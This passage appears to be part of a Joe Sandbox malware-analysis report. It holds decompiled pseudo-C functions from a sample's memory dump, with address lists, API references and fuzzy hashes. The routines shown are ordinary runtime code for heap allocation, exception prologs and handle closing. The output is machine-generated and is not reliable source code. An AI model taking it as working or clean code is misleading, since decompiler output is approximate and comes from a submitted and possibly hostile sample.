					_push(_t62 - 0x24);
					_t50 = _t62 - 0x7d24;
					_t33 = E00E61971(_t62 - 0x7d24, _t57);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2); // executed
						_t38 = E00E838A3(_t50); // executed
						_t55 = _t38;
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E00E7F750(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E00E61609(_t62 - 0x24);
					E00E61653(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E00E61653(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}

0x00e7aa53
0x00e7aa53
0x00e7aa53
0x00e7aa58
0x00e7aa5d
0x00e7aa63
0x00e7aa69
0x00e7aa6a
0x00e7aa6d
0x00e7aa77
0x00e7aa7a
0x00e7aa88
0x00e7aa8c
0x00e7aa97
0x00e7aaa8
0x00e7aaab
0x00e7aaae
0x00e7aab1
0x00e7aab4
0x00e7aaba
0x00e7aabe
0x00e7aabf
0x00e7aac5
0x00e7aaca
0x00e7aacc
0x00e7aace
0x00e7aad1
0x00e7aad7
0x00e7aad8
0x00e7aade
0x00e7aae3
0x00e7aae5
0x00e7aae7
0x00e7aaed
0x00e7aaf0
0x00e7aaf8
0x00e7aae9
0x00e7aae9
0x00e7aae9
0x00e7ab03
0x00e7ab03
0x00e7ab08
0x00e7ab13
0x00e7ab18
0x00e7aa99
0x00e7aa9f
0x00e7aaa4
0x00e7aaa4
0x00e7ab1f
0x00e7ab2a

APIs

__EH_prolog.LIBCMT ref: 00E7AA58

Part of subcall function 00E613A2: __EH_prolog.LIBCMT ref: 00E613A7
Part of subcall function 00E613A2: new.LIBCMT ref: 00E61420

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0a985997b7fa5533a54725bb34edfa695110ce5908fbb6b6d27e3c9568f25cb9
Instruction ID: 3fe1dcde70df53945af4a7dd0029af6ccbfaa881c0cfd9479b3997730b6bd2b6
Opcode Fuzzy Hash: 0a985997b7fa5533a54725bb34edfa695110ce5908fbb6b6d27e3c9568f25cb9
Instruction Fuzzy Hash: 4B21AC71C04249AECF15DFA4D9925EEBBF4AF59304F0854EEE809B3202D7356E05DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E69477 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E69477(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E00E7E554(E00E92153, _t42);
				E00E61380(_t42 - 0x20, E00E67EEC());
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E00E6CC70( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E00E6CE55( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_t40 = E00E6CC70( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
					} while (_t40 > 0);
				}
				_t21 = E00E615C2(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}

0x00e69477
0x00e6947c
0x00e6948e
0x00e6949c
0x00e694a5
0x00e694a9
0x00e694ac
0x00e694b0
0x00e694b3
0x00e694b3
0x00e694b5
0x00e694b6
0x00e694b8
0x00e694c0
0x00e694c0
0x00e694c4
0x00e694cd
0x00e694d4
0x00e694d5
0x00e694d7
0x00e694d7
0x00e694e7
0x00e694e9
0x00e694ee
0x00e694f2
0x00e694fb
0x00e69505

APIs

__EH_prolog.LIBCMT ref: 00E6947C

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b10dde7c65167fdd65c5287d2eb62a35baa21fb92a7bd3dea12c9e2e3984b50c
Instruction ID: d987d924e485b0353ed90ca3410eb2f6fa6eea45554884e4e3dd37cea15789e5
Opcode Fuzzy Hash: b10dde7c65167fdd65c5287d2eb62a35baa21fb92a7bd3dea12c9e2e3984b50c
Instruction Fuzzy Hash: 7A11E573A414289BCF12AFA8EC819EEBB75FF48390F046155F925B7212CE318C0187E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D3B2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E7D3B2(void* __ecx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E00E7E554(E00E92338, _t43);
				_push(_t26);
				E00E7E630();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E00E85AD6(0xeb4872, "X");
				E00E70188(0xeb6894, _t37, 0xe935b0);
				E00E85AD6(0xeb5892,  *((intOrPtr*)(_t43 + 0xc)));
				E00E65BD9(0xeac578, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0xeb3850 = _t18;
				 *0xeb384c = _t18;
				 *0xeb3848 = _t18;
				_t19 =  *0xea8461; // 0x0
				 *0xeb26cf = _t19;
				_t20 =  *0xea8462; // 0x0
				 *0xeb270c = 1;
				 *0xeb270f = 1;
				 *0xeb26d0 = _t20; // executed
				E00E67D8E(_t43 - 0x2110, _t37,  *_t4, 0xeac578); // executed
				 *(_t43 - 4) = 1;
				E00E67F05(_t43 - 0x2110, _t37,  *_t4);
				_t23 = E00E67E21(_t24, _t43 - 0x2110, _t37);
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}

0x00e7d3b2
0x00e7d3b7
0x00e7d3bc
0x00e7d3c2
0x00e7d3c7
0x00e7d3ca
0x00e7d3d7
0x00e7d3e8
0x00e7d3f5
0x00e7d406
0x00e7d40b
0x00e7d40b
0x00e7d417
0x00e7d418
0x00e7d41d
0x00e7d422
0x00e7d427
0x00e7d42c
0x00e7d431
0x00e7d437
0x00e7d43e
0x00e7d445
0x00e7d44a
0x00e7d455
0x00e7d459
0x00e7d464
0x00e7d46e
0x00e7d479

APIs

__EH_prolog.LIBCMT ref: 00E7D3B7

Part of subcall function 00E67D8E: __EH_prolog.LIBCMT ref: 00E67D93
Part of subcall function 00E67D8E: new.LIBCMT ref: 00E67DD8

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cfa508c69fa9cc0584374eb2a8b6edc3b71471593d2711d65bca6dfd979d1a4e
Instruction ID: 273d9f6f135c9cb4bd993c15ffbb98486c8e243beccfaeef5aaa8149cf15f60d
Opcode Fuzzy Hash: cfa508c69fa9cc0584374eb2a8b6edc3b71471593d2711d65bca6dfd979d1a4e
Instruction Fuzzy Hash: 9F112E32904244AEC704EB65AC03BD97BF4EF1A314F10529EF658773D2CFB116488B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E8BEE9 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E8BEE9(void* __edx, void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t31;
				char _t32;
				void* _t34;
				intOrPtr* _t36;

				_push(_t26);
				_push(_t26);
				_t16 = E00E888C9(_t26, 0x40, 0x30); // executed
				_t32 = _t16;
				_v12 = _t32;
				_t28 = _t31;
				if(_t32 != 0) {
					_t2 = _t32 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t32 - _t17;
					if(__eflags != 0) {
						_t3 = _t32 + 0x20; // 0x20
						_t36 = _t3;
						_t34 = _t17;
						do {
							_t4 = _t36 - 0x20; // 0x0
							E00E8A9DA(_t28, _t36, __eflags, _t4, 0xfa0, 0);
							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
							 *_t36 = 0;
							_t36 = _t36 + 0x30;
							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
							 *((char*)(_t36 - 0x24)) = 0xa;
							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
							 *((char*)(_t36 - 0x22)) = 0;
							__eflags = _t36 - 0x20 - _t34;
						} while (__eflags != 0);
						_t32 = _v12;
					}
				} else {
					_t32 = 0;
				}
				E00E887FE(0);
				return _t32;
			}

0x00e8beee
0x00e8beef
0x00e8bef6
0x00e8befb
0x00e8beff
0x00e8bf03
0x00e8bf06
0x00e8bf0c
0x00e8bf0c
0x00e8bf12
0x00e8bf14
0x00e8bf17
0x00e8bf17
0x00e8bf1a
0x00e8bf1c
0x00e8bf22
0x00e8bf26
0x00e8bf2b
0x00e8bf2f
0x00e8bf31
0x00e8bf34
0x00e8bf3a
0x00e8bf41
0x00e8bf45
0x00e8bf49
0x00e8bf4c
0x00e8bf4c
0x00e8bf50
0x00e8bf53
0x00e8bf08
0x00e8bf08
0x00e8bf08
0x00e8bf55
0x00e8bf62

APIs

Part of subcall function 00E888C9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E892E3,00000001,00000364,?,00E83B5F,?,?,00EA0F50), ref: 00E8890A

_free.LIBCMT ref: 00E8BF55

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 6bff3819976252f51552513288e2c24277949b48af4e6902644b9bbca682764f
Instruction ID: 0bd26f51cebf4a2298e52386f2688d16430c0fc4ce3bdf85d4889db450ec36ed
Opcode Fuzzy Hash: 6bff3819976252f51552513288e2c24277949b48af4e6902644b9bbca682764f
Instruction Fuzzy Hash: 34014E732003456BE3219F55DC4195AFBD9FB85370F65051DE68C93280EB306C09CB34

Uniqueness

Uniqueness Score: -1.00%

Function 00E6AC78 Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E6AC78(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t22;

				_push(__ecx);
				_t22 = __ecx;
				_t24 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					_t15 = E00E7E512(__edx, __ecx, _t24, 0xb54); // executed
					_v8 = _t15;
					_t25 = _t15;
					if(_t15 == 0) {
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = E00E6AAD1(_t15, _t25);
					}
					 *((intOrPtr*)(_t22 + 8)) = _t16;
				}
				_t12 = _a4;
				 *_t22 = _t12;
				if(_t12 == 1) {
					 *(_t22 + 4) =  *(_t22 + 4) & 0x00000000;
				}
				if(_t12 == 2) {
					 *(_t22 + 4) =  *(_t22 + 4) | 0xffffffff;
				}
				if(_t12 == 3) {
					E00E6594B( *((intOrPtr*)(_t22 + 8)));
				}
				_t13 = _a8;
				if(_t13 >= 8) {
					_t13 = 8;
				}
				 *((intOrPtr*)(_t22 + 0x10)) = _t13;
				return _t13;
			}

0x00e6ac7b
0x00e6ac7d
0x00e6ac7f
0x00e6ac83
0x00e6ac8a
0x00e6ac8f
0x00e6ac93
0x00e6ac95
0x00e6aca0
0x00e6aca0
0x00e6ac97
0x00e6ac99
0x00e6ac99
0x00e6aca2
0x00e6aca2
0x00e6aca5
0x00e6aca8
0x00e6acad
0x00e6acaf
0x00e6acaf
0x00e6acb6
0x00e6acb8
0x00e6acb8
0x00e6acbf
0x00e6acc4
0x00e6acc4
0x00e6acc9
0x00e6accf
0x00e6acd3
0x00e6acd3
0x00e6acd4
0x00e6acdb

APIs

new.LIBCMT ref: 00E6AC8A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32e030e56ca408e2cadd61ea5deee89bfcd19d67a893660a95bbbe1e9754997
Instruction ID: 4cd73882f9e1c4af7227333bfc2e0862660bd60c147182b3998f842b9853d9cf
Opcode Fuzzy Hash: e32e030e56ca408e2cadd61ea5deee89bfcd19d67a893660a95bbbe1e9754997
Instruction Fuzzy Hash: E3F0A431D907059FDB30DF25E941626F7E4EB15374F24992ED496F3690D770D8409B42

Uniqueness

Uniqueness Score: -1.00%

Function 00E888C9 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00E888C9(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xec16ec, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00E886B4();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00E88C7A())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00E8749D(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00e888c9
0x00e888cf
0x00e888d4
0x00e888e2
0x00e888e2
0x00e888e8
0x00e888ea
0x00e888ea
0x00e88901
0x00e8890a
0x00e88912
0x00000000
0x00000000
0x00e888f2
0x00e888f4
0x00e88916
0x00e8891b
0x00e88921
0x00000000
0x00e88921
0x00e888f7
0x00e888fc
0x00e888fd
0x00e888ff
0x00000000
0x00000000
0x00e888ff
0x00000000
0x00e88901
0x00e888da
0x00e888db
0x00e888e0
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E892E3,00000001,00000364,?,00E83B5F,?,?,00EA0F50), ref: 00E8890A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5c4409b4231deb7971db2560a7ac99342fd1fed3e7b5656c73656a7b23cdeecd
Instruction ID: 604f6843663804663db377fce28a89a19f4802b8b5dfe37abdc0bf7b8daa0802
Opcode Fuzzy Hash: 5c4409b4231deb7971db2560a7ac99342fd1fed3e7b5656c73656a7b23cdeecd
Instruction Fuzzy Hash: FAF02B31A081246BDB223A269E00B6A77889F803A4B94A111FC1CF6061CF20DD004BE2

Uniqueness

Uniqueness Score: -1.00%

Function 00E88838 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00E88838(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00E88C7A())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xec16ec, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00E886B4();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00E8749D(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00e88838
0x00e8883e
0x00e88844
0x00e88876
0x00e8887b
0x00e88881
0x00000000
0x00e88881
0x00e88848
0x00e8884a
0x00e8884a
0x00e88861
0x00e8886a
0x00e88872
0x00000000
0x00000000
0x00e88852
0x00e88854
0x00000000
0x00000000
0x00e88857
0x00e8885c
0x00e8885d
0x00e8885f
0x00000000
0x00000000
0x00e8885f
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00E83CF6,?,0000015D,?,?,?,?,00E851D2,000000FF,00000000,?,?), ref: 00E8886A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b3deaaaa6d71130ef5e328f16acd9ba6221999269a361ae2f5905b868df8b0c4
Instruction ID: 7a5728e5c0983e7260ef5ec735d261bbb6b973bfbc81e7436aa83ea2c662c15d
Opcode Fuzzy Hash: b3deaaaa6d71130ef5e328f16acd9ba6221999269a361ae2f5905b868df8b0c4
Instruction Fuzzy Hash: 47E0E5316042119AD73876A66F05B5B7A9C9F013A4FD46121AC5CF2092CE10DC0047E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E65B57 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E65B57(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E00E7E554(E00E92048, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E00E6B26D(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00E70166();
				 *(_t36 - 4) = 1;
				E00E70166();
				 *(_t36 - 4) = 2;
				E00E70166();
				 *(_t36 - 4) = 3;
				E00E70166();
				 *(_t36 - 4) = 4;
				E00E70166();
				 *(_t36 - 4) = 5;
				E00E65D4C(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x00e65b57
0x00e65b5c
0x00e65b61
0x00e65b63
0x00e65b65
0x00e65b68
0x00e65b6d
0x00e65b6d
0x00e65b77
0x00e65b82
0x00e65b86
0x00e65b91
0x00e65b95
0x00e65ba0
0x00e65ba4
0x00e65baf
0x00e65bb3
0x00e65bba
0x00e65bbe
0x00e65bc9
0x00e65bd3

APIs

__EH_prolog.LIBCMT ref: 00E65B5C

Part of subcall function 00E6B26D: __EH_prolog.LIBCMT ref: 00E6B272

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 23545b11e15a1b5ccbd6f1bcfc97d0c706a9281689c04887a5f3f2a4fc41dabb
Instruction ID: ca9944d46e43362844b6e885e19041a50d39fbbd959b86c25d1acd4c5b51c983
Opcode Fuzzy Hash: 23545b11e15a1b5ccbd6f1bcfc97d0c706a9281689c04887a5f3f2a4fc41dabb
Instruction Fuzzy Hash: 8F016D30A06684EAD715E7A8D8163EFF7F89F15304F50918DB85E63282DFB41B08C662

Uniqueness

Uniqueness Score: -1.00%

Function 00E69870 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E69870(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1a)) != _t16) {
					E00E66E07(0xea0f50, _t21 + 0x24);
				}
				return _t16;
			}

0x00e69872
0x00e69874
0x00e6987a
0x00e69880
0x00e69891
0x00e69896
0x00e69898
0x00e69898
0x00e6989a
0x00e6989a
0x00e6989e
0x00e698a4
0x00e698b4
0x00e698b4
0x00e698bd

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00E6982C,?,?,?,?,00E91F81,000000FF), ref: 00E6988B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 291ab9ce399e0591774a84e6ff8334e3a8ae26597bb3736a3e6d5657338dc47f
Instruction ID: eed1c245ee6e4a88b13a231ca11550d3ea28289230d57640d5a81cd8f15c9a10
Opcode Fuzzy Hash: 291ab9ce399e0591774a84e6ff8334e3a8ae26597bb3736a3e6d5657338dc47f
Instruction Fuzzy Hash: 4EF0E9305C57005EEB348A24E50979277D86B13379F046B1EC0F6234E1C371694C8B00

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A6B9 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E6A6B9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E00E6BB15(_a4) == 0) {
					_t12 = E00E6A7E7(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00E6A3D5( *((intOrPtr*)(_t20 + 0x1008)));
